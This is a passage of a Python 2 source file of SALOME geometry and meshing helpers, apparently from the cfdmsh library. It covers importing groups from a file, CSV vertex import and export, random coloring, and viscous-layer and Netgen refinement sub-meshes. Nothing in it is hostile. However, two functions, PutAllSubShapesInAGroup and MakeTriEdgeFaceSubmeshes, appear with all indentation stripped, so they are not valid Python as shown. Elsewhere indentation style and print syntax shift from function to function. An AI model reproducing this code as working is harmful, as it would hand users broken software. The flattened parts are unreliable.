            old_group_id = salome.ObjectToID(old_group)
            if old_group_id in visible_ids:
                visible_old_groups.append(old_group)
        #-
        # Get the already existing group names
        visible_old_group_names = [visible_old_group.GetName() for visible_old_group in visible_old_groups]
        #-
        # Open the group file
        group_file = open(file, "r")
        #-
        # Import the groups. The file format is a repeating 3-line cycle written
        # by ExportGeometricalGroups: name, type, IDs. "i" tracks the position
        # inside the current cycle (0 = name line, 1 = type line, 2 = ID line).
        i = 0
        for line in group_file:
            line = line[:-1]# Delete ending "\n"
            # Get the group name
            if i == 0:
                group_name = line
            #-
            # Get the group type and create or get the group
            if i == 1:
                group_type = int(line)
                ############
                ############
                ############
                # Decide whether this group passes the "only"/"ignore"/"type"
                # filters; pass_group stays set for the following ID line too.
                pass_group = False
                if only != [None] and group_name not in only:
                    pass_group = True
                if ignore != [None] and group_name in ignore:
                    pass_group = True
                if type != None and group_type != geompy.ShapeType[type.upper()]:
                    pass_group = True
                ############
                ############
                ############
                if pass_group == False:
                    if group_name in visible_old_group_names:# If the group already exists...
                        # Get the already existing group and delete it (best effort)
                        j = 0
                        for visible_old_group_name in visible_old_group_names:
                            if group_name == visible_old_group_name:
                                try:
                                    salome.geom.geomtools.GeomStudyTools().deleteShape(salome.ObjectToID(visible_old_groups[j]))
                                except:
                                    pass
                                break
                            j += 1
                        #-
                    # Create the new group
                    new_group = geompy.CreateGroup(shape, group_type)
                    #-
                #-
            #-Get the IDs and add them to the new group
            if i == 2:
                if pass_group == False:
                    shape_ids = line.split()
                    for shape_id in shape_ids:
                        geompy.AddObject(new_group, int(shape_id))
                    if add == True:
                        id = geompy.addToStudyInFather(shape, new_group, group_name)
                        gg.createAndDisplayGO(id)
                        if salome.sg.hasDesktop():
                            salome.sg.updateObjBrowser(1)
            #-
            i += 1
            if i == 3:
                i = 0
        #-
        # Close the group file
        group_file.close()
    #-
igg = ImportGeometricalGroups
def PutAllSubShapesInAGroup( dim, shape = None, add = True, infa = True ):
"""
Description:
Create a geometrical group containing all sub-shapes of a given dimension.
Arguments:
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# shape
Description: The source shape.
Type: Any geometrical object
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: 0
"single" value: -
Type: Group of Vertexes
Number: 1
Name: "AllSubShapes (Vertexes)"
"dim" value: 1
"single" value: -
Type: Group of Edges
Number: 1
Name: "AllSubShapes (Edges)"
"dim" value: 2
"single" value: -
Type: Group of Faces
Number: 1
Name: "AllSubShapes (Faces)"
"dim" value: 3
"single" value: -
Type: Group of Solids
Number: 1
Name: "AllSubShapes (Solids)"
Conditions of use:
-
"""
if dim not in [0, 1, 2, 3]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
shape = GetGUISelection(shape)
shape = GetObject(shape)
#-
# Make this function recursive
if isinstance(shape, list):
return_list = []
for sub_object in shape:
return_list.append(PutAllSubShapesInAGroup(dim, sub_object, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [shape] or None in [shape]: return
#-
# Set father object
father = None
if infa == True: father = shape
#-
if False: pass
else:# All checks done
# Get the group type
if dim == 0: group_type = geompy.ShapeType["VERTEX"]
if dim == 1: group_type = geompy.ShapeType["EDGE"]
if dim == 2: group_type = geompy.ShapeType["FACE"]
if dim == 3: group_type = geompy.ShapeType["SOLID"]
#-
# Create the group
group = geompy.CreateGroup(shape, group_type)
#-
# Get the sub - shape IDs
sub_shape_ids = geompy.SubShapeAllIDs(shape, group_type)
#-
# Add the sub-shapes in the group
for sub_shape_id in sub_shape_ids:
geompy.AddObject(group, sub_shape_id)
#-
# Publish the group
if add == True:
if dim == 0: geompy.addToStudyInFather(father, group, "AllSubShapes (Vertexes)")
if dim == 1: geompy.addToStudyInFather(father, group, "AllSubShapes (Edges)")
if dim == 2: geompy.addToStudyInFather(father, group, "AllSubShapes (Faces)")
if dim == 3: geompy.addToStudyInFather(father, group, "AllSubShapes (Solids)")
# Update the study tree
salome.sg.updateObjBrowser(1)
#-
return group
#-
passiag = PutAllSubShapesInAGroup
def SetRandomColors( ):
    """
    Description:
        Applies random colors on selected shapes in the Geometry module's 3D windows.
        On mesh groups and sub-meshes, the coloration takes effect only if the input objects were not displayed yet. Else, the mesh has to be cleared and computed again.
    Arguments:
        # -
            Description: -
            Type: -
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: -
    Returned Values:
        "dim" value: -
        "single" value: -
        Type: -
        Number: -
        Name: -
    Conditions of use:
        This functions works only when used from the GUI.
    """
    gg = salome.ImportComponentGUI("GEOM")
    # Get selected objects
    selected_object_ids = salome.sg.getAllSelected()
    nb_selected_objects = len(selected_object_ids)
    selected_objects = []
    for selected_object_id in selected_object_ids:
        selected_objects.append(salome.myStudy.FindObjectID(selected_object_id).GetObject())
    #-
    # Define a palette of well-contrasted preset colors, used first
    colors = [\
        [255, 0, 0], \
        [0, 0, 255], \
        [0, 255, 0], \
        [0, 255, 255], \
        [255, 0, 128], \
        [255, 128, 0], \
        [255, 255, 0], \
        [235, 235, 235], \
        [20, 20, 20], \
        [255, 0, 255], \
        [255, 128, 128], \
        [128, 255, 128], \
        [0, 128, 255], \
        [255, 255, 128], \
        [255, 128, 255], \
        [128, 255, 255], \
        [128, 0, 255], \
        [0, 255, 128], \
        [128, 128, 255], \
        [128, 255, 0], \
        [128, 128, 128], \
        ]
    nb_colors = len(colors)
    #-
    # Complete the palette with random colors when there are more selected
    # objects than presets. Fixes of the original code: the inner loop no
    # longer shadows the outer loop variable, and randint(0, 255) can actually
    # produce 255 (int(random.random() * 255) never could).
    for extra_color_index in range(nb_selected_objects - nb_colors):
        colors.append([random.randint(0, 255) for channel in range(3)])
    #-
    colors.reverse()
    #random.shuffle(colors)
    # Set color of selected objects; GEOM objects are colored through the GUI
    # component, SMESH objects through their own SetColor method (best effort)
    for selected_object_id, selected_object in zip(selected_object_ids, selected_objects):
        color = colors.pop()
        if "<SMESH." in str(selected_object):
            try:
                selected_object.SetColor(SALOMEDS.Color(color[0] / 255.0, color[1] / 255.0, color[2] / 255.0))
            except:
                pass
        if "<GEOM." in str(selected_object):
            gg.setColor(selected_object_id, color[0], color[1], color[2])
    #-
src = SetRandomColors
def ExportCSVFile( compound = None, file = None, head = True ):
    """
    Description:
        Exports a 3D vertex compound into a CSV file.
    Arguments:
        # compound
            Description: The vertex compound to export.
            Type: Compound of Vertexes
            GUI selection: yes
            Selection by name: yes
            Recursive: -
            Default value: None
        # file
            Description: The name of the file to write.
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: None
        # head
            Description: Defines if the function has to write a header to the file.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
    Returned Values:
        "dim" value: -
        "single" value: -
        Type: -
        Number: -
        Name: -
    Conditions of use:
        -
    """
    # Get the input shape(s); the original "input_shape" round-trip variable
    # and dead "if False: pass" branch were removed — behavior is unchanged
    compound = GetGUISelection(compound)
    compound = GetObject(compound)
    #-
    # Check the input shape existence
    if "error" in [compound] or None in [compound]: return
    #-
    # Get vertexes
    vertexes = GetSubShapes(compound)[0]
    #-
    # Default the file name to the compound name
    if file == None:
        file = compound.GetName()
    #-
    # Export the vertexes into the CSV file, one "x,y,z" row per vertex
    # ("wb" is the mode required by the csv module under Python 2)
    with open(file, "wb") as csvfile:
        writer = csv.writer(csvfile, quoting = csv.QUOTE_NONNUMERIC)
        if head == True:
            writer.writerow(["X","Y","Z"])
        for vertex in vertexes:
            writer.writerow(geompy.PointCoordinates(vertex))
    #-
ecf = ExportCSVFile
def ImportCSVFile( file, single = True, add = True ):
    """
    Description:
        Imports a CSV file describing a 3D set of vertexes.
        The expected format is comma-separated "x,y[,z]" records; a missing
        third column defaults z to 0. Lines whose first two fields are not
        numbers (e.g. a header row) are silently skipped.
    Arguments:
        # file
            Description: The name of the file to read.
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: yes
            Default value: -
        # single
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
    Returned Values:
        "dim" value: -
        "single" value: False
        Type: Vertex
        Number: n
        Name: "VertexFromCSVFile"
        "dim" value: -
        "single" value: True
        Type: Compound of Vertexes
        Number: 1
        Name: "VertexesFromCSVFile"
    Conditions of use:
        -
    """
    # Make this function recursive
    if isinstance(file, list):
        return_list = []
        for sub_object in file:
            return_list.append(ImportCSVFile(sub_object, single, add))
        return return_list
    #-
    # Put the CSV file into a list of non-blank lines
    # (the large commented-out separator-autodetection block of the original
    # was dead code and has been removed; the separator is the comma)
    file_line_list = []
    with open(file, "r") as opened_file:
        for line in opened_file:
            if not line.isspace():
                file_line_list.append(line)
    #-
    # Import the vertexes from the CSV file
    vertex_list = []
    for line in file_line_list:
        split_line = line.split(",")
        try:
            x = float(split_line[0])
            y = float(split_line[1])
        except (ValueError, IndexError):# Non-numeric or short record: skip it
            continue
        if len(split_line) == 3:
            try:
                z = float(split_line[2])
            except ValueError:
                continue
        else:
            z = 0.0
        vertex_list.append(geompy.MakeVertex(x, y, z))
    #-
    to_return = vertex_list
    to_return_name = "VertexFromCSVFile"
    if single == True:
        to_return = geompy.MakeCompound(vertex_list)
        to_return_name = "VertexesFromCSVFile"
    # Add and return the resulting shape(s)
    if add == True:
        slow_add = False
        if not isinstance(to_return, list) or single == True: slow_add = True
        AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
        if slow_add == False:
            if salome.sg.hasDesktop():
                salome.sg.updateObjBrowser(1)
    return to_return
    #-
icf = ImportCSVFile
def MakeVirtualOffsetEdgeSubmeshes( thick_and_size, group_and_mesh = [None], np = 40, curv = True, rev = False, add = True, infa = False, dim = -1 ):
    """
    Description:
        Creates submeshes on an edge group so as to prepare it for automatic viscous layer meshing.
    Arguments:
        # thick_and_size
            Description: The desired viscous layer thickness and the desired cell size along the edge.
            Type: List of 2 Floats
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: -
        # group_and_mesh
            Description: The input group and the mesh in which to create sub-meshes.
            Type: List of1 Group of Edges + 1 Mesh
            GUI selection: yes
            Selection by name: yes
            Recursive: -
            Default value: [None]
        # np
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 40
        # curv
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # rev
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # dim
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: -1
    Returned Values:
        "dim" value: 1
        "single" value: -
        Type: Compound of Edges
        Number: 1
        Name: "VirtualOffset"
        "dim" value: -1
        "single" value: -
        Type: -
        Number: -
        Name: -
    Conditions of use:
        -
    """
    # Validate the arguments before touching the study
    if dim not in [-1, 0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
    if not isinstance(thick_and_size, list):
        print "[X] The first argument (thick_and_size) should be an array."; return
    if not isinstance(group_and_mesh, list):
        print "[X] The second argument (group_and_mesh) should be an array."; return
    if len(thick_and_size) != 2:
        print "[X] The first argument (thick_and_size) should have exactly two elements."; return
    input_shapes = group_and_mesh
    # Get the input shape(s), looking in both the GEOM and SMESH components
    input_shapes = GetGUISelection(input_shapes)
    input_shapes = GetObject(input_shapes, "GEOM", silent = True) + GetObject(input_shapes, "SMESH", silent = True)
    #-
    # Distinguish input shapes by their string representation
    group = None
    mesh = None
    for object in input_shapes:
        if "GEOM_Object instance" in str(object): group = object
        if "SMESH_Mesh instance" in str(object) or "meshProxy instance" in str(object) or "Mesh object" in str(object): mesh = object
    if None in [group, mesh]:
        print "[X] The input objects are incorrect or the Mesh module was not yet loaded."; return
    #-
    # Set father object
    father = None
    if infa == True: father = group
    #-
    if False: pass
    else:# All checks done
        # Get input objects
        [dist, step] = thick_and_size
        try:
            # Wrap the raw SMESH object into a smesh.Mesh helper when possible
            mesh = smesh.Mesh(mesh)
        except:
            pass
        main_shape = group.GetMainShape()
        if main_shape == None:
            print "[X] The input group has no parent shape."; return
        group_name = group.GetName()
        group_vertexes = GetSubShapes(group)[0]
        #-
        # Check if the group is "wire-shaped"
        group_edge_list = GetSubShapes(group)[1]
        try:
            group_wire = geompy.MakeWire(group_edge_list)
        except:
            print "[X] The input group should be \"wire-shaped\"."; return
        #-
        # Make wire edge offsets; a negative distance reverses the offset side
        if rev == True:
            dist *= -1
        offsets = MakePlanarWireOffset(dist, group_wire, np = np, curv = curv, simple = True, single = False, add = False)
        edges = GetReorderedEdges(group_wire, add = False)
        #-
        if dim == 1:
            # Only the offset edges were requested: return them as a compound
            compound = geompy.MakeCompound(offsets)
            to_return = compound
            to_return_name = "VirtualOffset"
        else:
            whole_vertex_list = list(group_vertexes)
            nb_edges = len(edges)
            for i in range(nb_edges):# For each edge of the input group...
                # offsets[i] is assumed to correspond to edges[i]
                # (both come from the same reordered wire)
                edge = edges[i]
                offset = offsets[i]
                offset_vertexes = GetSubShapes(offset)[0]
                whole_vertex_list += offset_vertexes
                # Get the number of steps along the offset for the target cell size
                edge_length = geompy.BasicProperties(edge)[0]
                offset_length = geompy.BasicProperties(offset)[0]
                nb_steps = math.ceil(offset_length / step)
                real_step = offset_length / nb_steps
                #-
                # Project offset vertexes on the edge
                distance = real_step
                projected_vertex_list = []
                vertex_on_offset_list = []
                while distance < offset_length - real_step / 2:
                    vertex_on_offset = geompy.MakeVertexOnCurveByLength(offset, distance)
                    vertex_on_offset_list.append(vertex_on_offset)
                    ##############################
                    #projected_vertex = geompy.MakeProjection(vertex_on_offset, edge)# Not available on Salome 7.5.1
                    [x,y,z] = geompy.ClosestPoints(vertex_on_offset, edge)[1][3:6]
                    projected_vertex = geompy.MakeVertex(x, y, z)
                    ##############################
                    projected_vertex_list.append(projected_vertex)
                    distance += real_step
                #-
                whole_vertex_list += projected_vertex_list
                whole_vertex_list += vertex_on_offset_list
                # Split the edge with projected vertexes
                discretized_edge = geompy.MakePartition([edge], projected_vertex_list)
                #-
                # Reorder discretized edges
                reordered_edges = GetReorderedEdges(discretized_edge, add = False)
                nb_sub_edges = len(reordered_edges)
                #-
                if dim == -1:
                    # Publish the edge in the study tree
                    published_edge = geompy.GetInPlace(group, edge, theName = "SubEdge_" + str(i))
                #-
                if nb_sub_edges == 1:# If the edge was not discretized...
                    if dim == -1:
                        # Create a Nb. Segments sub-mesh with a single segment
                        algo = mesh.Segment(geom = published_edge)
                        hypo = algo.NumberOfSegments(1)
                        mesh.GetSubMesh(published_edge, "VirtualOffsetSubmesh_" + str(i) + " on " + group_name)
                    #-
                else:# If the edge was discretized...
                    # Get the suitable Fixed Points 1D hypothesis parameters
                    # (cumulated curvilinear positions normalized by the edge length)
                    parameter_list = []
                    total_distance = 0
                    for sub_edge in reordered_edges:
                        sub_edge_length = geompy.BasicProperties(sub_edge)[0]
                        parameter = (total_distance + sub_edge_length) / edge_length
                        parameter_list.append(parameter)
                        if len(parameter_list) == nb_sub_edges - 1:
                            break
                        total_distance += sub_edge_length
                    #-
                    if dim == -1:
                        # Create temporary mesh and Fixed Points 1D sub-mesh
                        tmp_mesh = smesh.Mesh(main_shape)
                        algo = tmp_mesh.Segment(geom = published_edge)
                        tmp_hypo = algo.FixedPoints1D(parameter_list, [1] * nb_sub_edges, [])
                        sub_mesh = tmp_mesh.GetSubMesh(published_edge, "VirtualOffsetSubmesh_" + str(i) + " on " + group_name)
                        tmp_mesh.Compute()
                        #-
                        # Check if the edge is reversed: mesh the edge once without
                        # reversal and count the mesh nodes not matching the
                        # projected vertexes
                        vertex_compound = MakeVertexesFromMeshGroup(sub_mesh, add = False)
                        projected_vertex_compound = geompy.MakeCompound(projected_vertex_list)
                        cut = geompy.MakeCut(vertex_compound, projected_vertex_compound)
                        nb_resting_vertexes = geompy.NumberOfSubShapes(cut, geompy.ShapeType["VERTEX"])
                        reversed_edges = []
                        if nb_resting_vertexes > 2:
                            reversed_edges = [published_edge]
                        #-
                        # Delete temporary geometrical shapes and mesh (best effort)
                        #http://www.salome-platform.org/forum/forum_10/366900504#419952388
                        try:
                            so = salome.ObjectToSObject(vertex_compound)
                            sb = salome.myStudy.NewBuilder()
                            sb.RemoveObjectWithChildren(so)
                        except:
                            pass
                        try:
                            so = salome.ObjectToSObject(tmp_mesh.GetMesh())
                            sb = salome.myStudy.NewBuilder()
                            sb.RemoveObjectWithChildren(so)
                        except:
                            pass
                        try:
                            so = salome.ObjectToSObject(tmp_hypo)
                            sb = salome.myStudy.NewBuilder()
                            sb.RemoveObjectWithChildren(so)
                        except:
                            pass
                        #-
                        # Create the final Fixed Points 1D sub-mesh
                        algo = mesh.Segment(geom = published_edge)
                        hypo = algo.FixedPoints1D(parameter_list, [1] * nb_sub_edges, reversed_edges)
                        mesh.GetSubMesh(published_edge, "VirtualOffsetSubmesh_" + str(i) + " on " + group_name)
                        #-
            if dim == 0:
                compound = geompy.MakeCompound(whole_vertex_list)
                to_return = compound
                to_return_name = "VirtualOffset (Vertexes)"
        if dim >= 0:
            if add == True:
                # Add and return the resulting shape(s)
                # NOTE(review): the nested "if add == True:" duplicates the test
                # just above, and with add=False nothing is returned even though
                # to_return was built — confirm whether that is intentional.
                if add == True:
                    AddToStudy(to_return, to_return_name, father)
                return to_return
                #-
        else:
            # Update the study tree
            if salome.sg.hasDesktop():
                salome.sg.updateObjBrowser(1)
            #-
mvoes = MakeVirtualOffsetEdgeSubmeshes
def MakeTriEdgeFaceSubmeshes( groups_and_mesh = None ):
"""
Description:
Creates quadrangle submeshes on tri-edge face groups (that can be create using the GetTriEdgeFaces function) and add base vertexes when possible.
Arguments:
# groups_and_mesh
Description: The input tri-edge face groups and the mesh in which to create sub-meshes.
Type: List ofGroups of 1 Face + 1 Mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
# Get the input shape(s)
groups_and_mesh = GetGUISelection(groups_and_mesh)
groups_and_mesh = GetObject(groups_and_mesh, "GEOM", silent = True) + GetObject(groups_and_mesh, "SMESH", silent = True)
#-
# Distinguish input shapes
mesh = None
groups = []
for object in groups_and_mesh:
if "SMESH_Mesh instance" in str(object) or "meshProxy instance" in str(object) or "Mesh object" in str(object): mesh = object
if "GEOM_Object instance" in str(object): groups.append(object)
if None in [mesh] or len(groups) == 0:
print "[X] The input objects are incorrect or the Mesh module was not yet loaded."; return
#-
else:# All checks done
try:
mesh = smesh.Mesh(mesh)
except:
pass
# Get the mesh main shape
main_shape = mesh.GetShape()
#-
# For each input group...
for group in groups:
# Get group edge
group_edges = geompy.SubShapeAll(group, geompy.ShapeType["EDGE"])
#-
# Keep only straight edges
straight_edges = []
for edge in group_edges:
edge_length = geompy.BasicProperties(edge)[0]
edge_vertexes = geompy.SubShapeAll(edge, geompy.ShapeType["VERTEX"])
min_edge_length = geompy.MinDistance(edge_vertexes[0], edge_vertexes[1])
if abs(edge_length - min_edge_length) < 1e-9:
straight_edges.append(edge)
#-
# Get the group vertexes
group_vertexes = geompy.SubShapeAll(group, geompy.ShapeType["VERTEX"])
#-
# Find the base vertex
base_vertex = None
for vertex in group_vertexes:
nb_touching_edges = 0
for edge in straight_edges:
if geompy.MinDistance(edge, vertex) < 1e-9:
nb_touching_edges += 1
if nb_touching_edges == 2:
base_vertex = vertex
break
#-
# Get the base vertex ID
base_vertex_id = geompy.GetSubShapeID(main_shape, base_vertex)
#-
# Create a sub-mesh on the group
algo = mesh.Quadrangle(geom = group)
hypo = algo.QuadrangleParameters()
hypo.SetTriaVertex(base_vertex_id)
submesh = mesh.GetSubMesh(group, group.GetName())
#-
# Update the study tree
salome.sg.updateObjBrowser(1)
#-
mtefs = MakeTriEdgeFaceSubmeshes
def ProjectEdgeSubmesh( submesh_and_edge = [None] ):
	"""
	Description:
		Projects orthogonally an edge sub-mesh on another.
	Arguments:
		# submesh_and_edge
			Description: The source submesh and the target sub-edge.
			Type: List of 1 Edge + 1 Sub-mesh
			GUI selection: yes
			Selection by name: yes
			Recursive: -
			Default value: [None]
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: -
		Number: -
		Name: -
	Conditions of use:
		The source sub-mesh has to be already computed.
	"""
	# Reject non-list input early: a two-element selection is expected.
	if isinstance(submesh_and_edge, list) == False: print "[X] The first argument (submesh_and_edge) should be an array."; return
	# Get the input shape(s)
	submesh_and_edge = GetGUISelection(submesh_and_edge)
	# Resolve names/objects from both the GEOM and SMESH study components.
	submesh_and_edge = GetObject(submesh_and_edge, "GEOM", silent = True) + GetObject(submesh_and_edge, "SMESH", silent = True)
	#-
	# Distinguish input shapes (recognized through their CORBA repr strings)
	submesh = None
	edge = None
	for object in submesh_and_edge:
		if "SMESH_subMesh instance" in str(object): submesh = object
		if "GEOM_Object" in str(object): edge = object
	if None in [submesh, edge]:
		print "[X] The input objects are incorrect or the Mesh module was not yet loaded."
		return
	#-
	else:# All checks done
		# Create vertexes from the sub-mesh
		vertexes_from_submesh_compound = MakeVertexesFromMeshGroup(submesh, add = False)
		vertexes_from_submesh = geompy.SubShapeAll(vertexes_from_submesh_compound, geompy.ShapeType["VERTEX"])
		#-
		# Project vertexes on the edge
		projected_vertex_list = []
		for vertex_from_submesh in vertexes_from_submesh:
			# ClosestPoints()[1] holds coordinate data; [3:6] is taken as the
			# point lying on the edge — TODO confirm against the GEOM API.
			[x, y, z] = geompy.ClosestPoints(vertex_from_submesh, edge)[1][3:6]
			projected_vertex_list.append(geompy.MakeVertex(x, y, z))
		#-
		# Split the edge with projected vertexes
		discretized_edge = geompy.MakePartition([edge], projected_vertex_list)
		#-
		# Get vertex parameters on the input edge
		edge_length = geompy.BasicProperties(edge)[0]
		reordered_edges = GetReorderedEdges(discretized_edge, add = False)
		nb_sub_edges = len(reordered_edges)
		parameter_list = []
		total_distance = 0
		for sub_edge in reordered_edges:
			sub_edge_length = geompy.BasicProperties(sub_edge)[0]
			# Curvilinear parameter (0..1) of the end of this sub-edge on the input edge.
			parameter = (total_distance + sub_edge_length) / edge_length
			parameter_list.append(parameter)
			# NOTE(review): the last parameter (1.0) is deliberately not appended —
			# presumably FixedPoints1D handles the edge end implicitly; confirm.
			if len(parameter_list) == nb_sub_edges - 1:
				break
			total_distance += sub_edge_length
		#-
		# Get the mesh
		mesh = smesh.Mesh(submesh.GetMesh())
		#-
		# Create a sub-mesh on the edge (one segment between consecutive fixed points)
		algo = mesh.Segment(geom = edge)
		fixed_points_hypo = algo.FixedPoints1D(parameter_list, [1] * nb_sub_edges, [])
		mesh.GetSubMesh(edge, edge.GetName())
		smesh.SetName(fixed_points_hypo, edge.GetName())
		#-
		# Update the study tree
		if salome.sg.hasDesktop():
			salome.sg.updateObjBrowser(1)
		#-
pes = ProjectEdgeSubmesh# Short alias (cfdmsh abbreviation convention).
def MakeNetgenRefinement( size, hypo_and_area = [None], ratio = 0.7, test = False ):
	"""
	Description:
		Create an arbitrary 3D refinement area in a Netgen hypothesis.
	Arguments:
		# size
			Description: The desired cell size in the refinement area.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: -
		# hypo_and_area
			Description: The volume defining the refinement area and the Netgen hypothesis.
			Type: List of 1 Mesh hypothesis + 1 Solid
			GUI selection: yes
			Selection by name: yes
			Recursive: -
			Default value: [None]
		# ratio
			Description: Defines the distance between edges describing the refinement area. If equals one, this distance equals the desired cell size. If lower than one, this distance is increased.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: 0.7
		# test
			Description: If equals True, the edges are not created, but the number of necessary edge is displayed in the Python console.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: False
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: Compound
		Number: 1
		Name: "RefinementEdges"
	Conditions of use:
		-
	"""
	if isinstance(size, str): print("[X] The first argument (size) should be a float number."); return
	if isinstance(hypo_and_area, list) == False: print("[X] The second argument (hypo_and_area) should be an array."); return
	# Get the input shape(s)
	hypo_and_area = GetGUISelection(hypo_and_area)
	hypo_and_area = GetObject(hypo_and_area, "GEOM", silent = True) + GetObject(hypo_and_area, "NETGENPlugin", silent = True)
	#-
	# Distinguish input shapes (recognized through their CORBA repr strings)
	hypo = None
	area = None
	for object in hypo_and_area:
		if str(object)[1:45] == "NETGENPlugin._objref_NETGENPlugin_Hypothesis": hypo = object
		if str(object)[1:25] == "GEOM._objref_GEOM_Object": area = object
	if None in [hypo, area]:
		print("[X] The input objects are incorrect or the Mesh module was not yet loaded.")
		return
	hypothesis_type = hypo.GetName()
	if str(hypothesis_type) != "NETGEN_Parameters_2D" and str(hypothesis_type) != "NETGEN_Parameters":
		print("[X] The selected hypothesis is not a Netgen 1D - 2D or Netgen 1D - 2D - 3D hypothesis.")
		return
	#-
	else:# All checks done
		# Get the area bounding box
		[x_min, x_max, y_min, y_max, z_min, z_max] = geompy.BoundingBox(area)
		# Shrink the box slightly along x so edges do not lie exactly on its boundary.
		# NOTE(review): only x is shrunk; y and z keep the raw bounding box — confirm intended.
		x_margin = (x_max - x_min) / 10000
		x_min += x_margin
		x_max -= x_margin
		#-
		# Create edges: a regular x-y grid of vertical (z_min -> z_max) segments.
		# Edge spacing is size / ratio, so ratio < 1 spreads the edges further apart.
		void_compound = geompy.MakeCompound([])
		nb_edges_x = int((x_max - x_min) / size * ratio)
		nb_edges_y = int((y_max - y_min) / size * ratio)
		# NOTE(review): if either count is <= 1 the step below divides by zero — confirm inputs.
		x_step = (x_max - x_min) / (float(nb_edges_x) - 1)
		y_step = (y_max - y_min) / (float(nb_edges_y) - 1)
		nb_edges = nb_edges_x * nb_edges_y
		print("[i] %s  edges to create." % nb_edges)
		if test == False:
			AddToStudy(void_compound, "RefinementEdges")
			edges = []
			x = x_min
			for i in range(nb_edges_x):
				y = y_min
				for j in range(nb_edges_y):
					start_vertex = geompy.MakeVertex(x, y, z_min)
					end_vertex = geompy.MakeVertex(x, y, z_max)
					edges.append(geompy.MakeEdge(start_vertex, end_vertex))
					y += y_step
				x += x_step
			# Keep only the parts of the edges lying inside the refinement volume.
			edge_compound = geompy.MakeCompound(edges)
			common = geompy.MakeCommon(area, edge_compound)
			edges = geompy.SubShapeAll(common, geompy.ShapeType["EDGE"])
			n = 1
			for edge in edges:
				geompy.addToStudyInFather(void_compound, edge, "edge_" + str(n))
				# Attach the local size to each edge of the refinement grid.
				hypo.SetLocalSizeOnShape(edge, size)
				n += 1
		#-
		if salome.sg.hasDesktop():
			salome.sg.updateObjBrowser(1)
		return void_compound
mnr = MakeNetgenRefinement# Short alias (cfdmsh abbreviation convention).
def SetNetgenRefinement( size, hypo_and_compound = [None], clear = False ):
	"""
	Description:
		Applies a new cell size on a Netgen refinement created thanks to the MakeNetgenRefinement function.
	Arguments:
		# size
			Description: The desired cell size in the refinement area.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: -
		# hypo_and_compound
			Description: The refinement compound containing refinement edges (eg. "RefinementEdges_1") and the Netgen hypothesis.
			Type: List of 1 Mesh hypothesis + 1 Compound
			GUI selection: yes
			Selection by name: yes
			Recursive: -
			Default value: [None]
		# clear
			Description: If equals True, every existing local size entry is removed from the hypothesis before the new sizes are set.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: False
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: -
		Number: -
		Name: -
	Conditions of use:
		The new cell size should not be lower than the one used to create the Netgen refinement.
	"""
	if isinstance(size, str): print "[X] The first argument (size) should be a float number."; return
	if isinstance(hypo_and_compound, list) == False: print "[X] The second argument (hypo_and_compound) should be an array."; return
	# Get the input shape(s)
	hypo_and_compound = GetGUISelection(hypo_and_compound)
	hypo_and_compound = GetObject(hypo_and_compound, "GEOM", silent = True) + GetObject(hypo_and_compound, "NETGENPlugin", silent = True)
	#-
	# Distinguish input shapes (recognized through their CORBA repr strings)
	hypo = None
	refinement_edge_compound = None
	for object in hypo_and_compound:
		if str(object)[1:45] == "NETGENPlugin._objref_NETGENPlugin_Hypothesis": hypo = object
		if str(object)[1:25] == "GEOM._objref_GEOM_Object": refinement_edge_compound = object
	if None in [hypo, refinement_edge_compound]:
		print "[X] The input objects are incorrect or the Mesh module was not yet loaded."
		return
	hypothesis_type = hypo.GetName()
	if str(hypothesis_type) != "NETGEN_Parameters_2D" and str(hypothesis_type) != "NETGEN_Parameters":
		print "[X] The selected hypothesis is not a Netgen 1D - 2D or Netgen 1D - 2D - 3D hypothesis."
		return
	#-
	else:# All checks done
		# Get the refinement edge compound ID
		refinement_edge_compound_id = refinement_edge_compound.GetStudyEntry()
		split_refinement_edge_compound_id = refinement_edge_compound_id.split(":")
		#-
		# Get the study object IDs
		study_object_ids = ListComponentShapes("GEOM", output = "ID")
		#-
		# Get the refinement edges
		# A study object is kept when its ID shares the compound's fourth ID
		# component and lies strictly deeper in the study tree (a child edge).
		refinement_edges = []
		for study_object_id in study_object_ids:
			split_study_object_id = study_object_id.split(":")
			if len(split_study_object_id) >= 4:
				if split_study_object_id[3] == split_refinement_edge_compound_id[3] and len(split_study_object_id) > 4:
